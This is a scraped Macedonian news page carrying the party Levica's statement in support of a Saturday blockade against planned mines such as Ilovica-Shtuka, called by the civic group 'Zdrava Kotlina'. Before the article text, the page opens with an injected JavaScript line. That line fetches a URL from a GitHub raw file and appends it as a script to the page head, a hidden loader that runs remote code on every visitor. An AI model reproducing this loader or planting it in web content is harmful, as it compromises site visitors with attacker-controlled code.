;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Левица ја поддржа најавената блокада против рудниците на смртта - Антропол
АктуелноЛокално

Левица ја поддржа најавената блокада против рудниците на смртта

Политичката партија „Левица” се одзва на повикот на иницијативата „Здрава Котлина” за заедничка борба на сите општествени-политички фактори против рудниците на смртта. Во продолжение го пренесуваме соопштението на партијата.

„Во ситуација на молк од страна на сите релевантни институции, при газењето на основните човекови права и потреби како чист воздух, здрава храна и здрава животна средина од страна на крупниот капитал, народот е оставен сам да се брани.

Години континуиран отпор, преку сите можни институционални начини, од страна на граѓаните не донесоа никаков резултат. Уставниот суд со сите контроверзни пресуди досега застана на страната на инвеститорите, односно донесе одлука со која во општина Карпош градежните инвеститори не беа спречени понатаму да градат, донесе одлука за општина Аеродром каде правото на приватна сопственост беше поставено над правото за здрав живот, за денес да донесе скандалозна одлука со која Уставниот суд го наруши суверенитетот на граѓаните изјаснати на референдум против рудниците на смртта и ги заштити бизнис интересите на странска корпорација. Минатата влада предводена од ВМРО-ДПМНЕ ги издаде дозволите за најавените рудници со кои ќе се изврши геноцид врз огромен дел од територијата на државата, додека актуелната власт и после две години одбива да ги поништи овие катастрофални проекти.

Затоа Левица објавува дека ќе се приклучи на најавената блокада во сабота, со почеток во 11:30 часот, по повикот објавен од страна на граѓанското здружение „Здрава котлина“. На предупредувачката и прва блокада ќе присуствуваат членови од локалниот огранок во Струмица заедно со модераторот Risto Nikolov и наши членови од останатите градови.

Воедно, ги повикуваме сите останати да се одважат на повикот преку директно вклучување во блокадата и да покажат солидарност со своите сограѓани. Ова што се случува нѐ засега сите. Најавениот рудник Иловица-Штука претставува закана за егзистенцијата на населението и животната средина во овој регион. Не е изолиран случај луѓе да се протерани од своето место на живеење заради градежна или индустриска експанзија. Ова не е прв пат профитот да биде ставен над човечкиот живот. Ова нѐ засега сите нас!”